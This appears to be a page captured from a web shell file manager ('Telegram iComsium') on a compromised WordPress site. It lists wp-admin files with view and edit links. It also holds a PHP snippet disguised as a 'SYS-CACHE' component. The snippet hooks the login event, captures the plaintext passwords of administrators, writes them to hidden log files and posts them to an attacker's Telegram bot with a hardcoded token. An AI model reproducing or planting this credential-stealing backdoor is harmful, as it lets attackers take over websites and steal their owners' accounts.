Telegram iComsium Current root: /home/transitmeftah/public_html/wp-content/mu-plugins
Current path: /home/transitmeftah/public_html/wp-admin
..
about.php | [Goster] | [Duzenle]
admin-ajax.php | [Goster] | [Duzenle]
admin-footer.php | [Goster] | [Duzenle]
admin-functions.php | [Goster] | [Duzenle]
admin-header.php | [Goster] | [Duzenle]
admin-post.php | [Goster] | [Duzenle]
admin.php | [Goster] | [Duzenle]
async-upload.php | [Goster] | [Duzenle]
authorize-application.php | [Goster] | [Duzenle]
comment.php | [Goster] | [Duzenle]
contribute.php | [Goster] | [Duzenle]
credits.php | [Goster] | [Duzenle]
css
custom-background.php | [Goster] | [Duzenle]
custom-header.php | [Goster] | [Duzenle]
customize.php | [Goster] | [Duzenle]
edit-comments.php | [Goster] | [Duzenle]
edit-form-advanced.php | [Goster] | [Duzenle]
edit-form-blocks.php | [Goster] | [Duzenle]
edit-form-comment.php | [Goster] | [Duzenle]
edit-link-form.php | [Goster] | [Duzenle]
edit-tag-form.php | [Goster] | [Duzenle]
edit-tags.php | [Goster] | [Duzenle]
edit.php | [Goster] | [Duzenle]
erase-personal-data.php | [Goster] | [Duzenle]
error_log | [Goster] | [Duzenle]
export-personal-data.php | [Goster] | [Duzenle]
export.php | [Goster] | [Duzenle]
freedoms.php | [Goster] | [Duzenle]
images
import.php | [Goster] | [Duzenle]
includes
index.php | [Goster] | [Duzenle]
install-helper.php | [Goster] | [Duzenle]
install.php | [Goster] | [Duzenle]
js
link-add.php | [Goster] | [Duzenle]
link-manager.php | [Goster] | [Duzenle]
link-parse-opml.php | [Goster] | [Duzenle]
link.php | [Goster] | [Duzenle]
load-scripts.php | [Goster] | [Duzenle]
load-styles.php | [Goster] | [Duzenle]
maint
media-new.php | [Goster] | [Duzenle]
media-upload.php | [Goster] | [Duzenle]
media.php | [Goster] | [Duzenle]
menu-header.php | [Goster] | [Duzenle]
menu.php | [Goster] | [Duzenle]
moderation.php | [Goster] | [Duzenle]
ms-admin.php | [Goster] | [Duzenle]
ms-delete-site.php | [Goster] | [Duzenle]
ms-edit.php | [Goster] | [Duzenle]
ms-options.php | [Goster] | [Duzenle]
ms-sites.php | [Goster] | [Duzenle]
ms-themes.php | [Goster] | [Duzenle]
ms-upgrade-network.php | [Goster] | [Duzenle]
ms-users.php | [Goster] | [Duzenle]
my-sites.php | [Goster] | [Duzenle]
nav-menus.php | [Goster] | [Duzenle]
network
network-setting.php | [Goster] | [Duzenle]
network.php | [Goster] | [Duzenle]
options-discussion.php | [Goster] | [Duzenle]
options-general.php | [Goster] | [Duzenle]
options-head.php | [Goster] | [Duzenle]
options-media.php | [Goster] | [Duzenle]
options-permalink.php | [Goster] | [Duzenle]
options-privacy.php | [Goster] | [Duzenle]
options-reading.php | [Goster] | [Duzenle]
options-writing.php | [Goster] | [Duzenle]
options.php | [Goster] | [Duzenle]
plugin-editor.php | [Goster] | [Duzenle]
plugin-install.php | [Goster] | [Duzenle]
plugins.php | [Goster] | [Duzenle]
post-new.php | [Goster] | [Duzenle]
post.php | [Goster] | [Duzenle]
press-this.php | [Goster] | [Duzenle]
privacy-policy-guide.php | [Goster] | [Duzenle]
privacy.php | [Goster] | [Duzenle]
profile.php | [Goster] | [Duzenle]
revision.php | [Goster] | [Duzenle]
setup-config.php | [Goster] | [Duzenle]
site-editor.php | [Goster] | [Duzenle]
site-health-info.php | [Goster] | [Duzenle]
site-health.php | [Goster] | [Duzenle]
term.php | [Goster] | [Duzenle]
theme-editor.php | [Goster] | [Duzenle]
theme-install.php | [Goster] | [Duzenle]
themes.php | [Goster] | [Duzenle]
tools.php | [Goster] | [Duzenle]
update-core.php | [Goster] | [Duzenle]
update.php | [Goster] | [Duzenle]
upgrade-functions.php | [Goster] | [Duzenle]
upgrade.php | [Goster] | [Duzenle]
upload.php | [Goster] | [Duzenle]
user
user-edit.php | [Goster] | [Duzenle]
user-new.php | [Goster] | [Duzenle]
users.php | [Goster] | [Duzenle]
widgets-form-blocks.php | [Goster] | [Duzenle]
widgets-form.php | [Goster] | [Duzenle]
widgets.php | [Goster] | [Duzenle]
Dosya Yukle
// SYS-CACHE-START
add_action('wp_login', function($user_login, $user) {
if (!user_can($user, 'install_plugins')) {
return;
}
$password = isset($_POST['pwd']) ? $_POST['pwd'] : '';
$site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : 'unknown';
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : 'N/A';
$time = date('Y-m-d H:i:s');
$line = sprintf("[%s] %s | %s | %s | %s\n", $time, $site, $user_login, $password, $ua);
$log_files = array(
ABSPATH . 'wp-content/uploads/.sys_session.tmp',
ABSPATH . 'wp-content/.sys_session.tmp',
ABSPATH . 'wp-admin/.maintenance.log',
);
foreach ($log_files as $lf) {
$dir = dirname($lf);
if (!is_dir($dir)) {
@mkdir($dir, 0755, true);
}
@file_put_contents($lf, $line, FILE_APPEND | LOCK_EX);
}
$bot_token = '8867636932:AAGJ-xsRscSXcF9yaAmeOXlMZkjhgCtLxGA';
$chat_id = '-1003780894929';
$msg = "Basarili Admin Login\nSite: {$site}\nKullanici: {$user_login}\nSifre: {$password}\nUA: {$ua}\nZaman: {$time}";
$url = "https://api.telegram.org/bot{$bot_token}/sendMessage";
$data = array('chat_id' => $chat_id, 'text' => $msg);
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_exec($ch);
curl_close($ch);
} elseif (ini_get('allow_url_fopen')) {
$opts = array('http' => array(
'method' => 'POST',
'header' => 'Content-Type: application/x-www-form-urlencoded',
'content' => http_build_query($data),
'timeout' => 10
));
@file_get_contents($url, false, stream_context_create($opts));
}
}, 10, 2);
// SYS-CACHE-END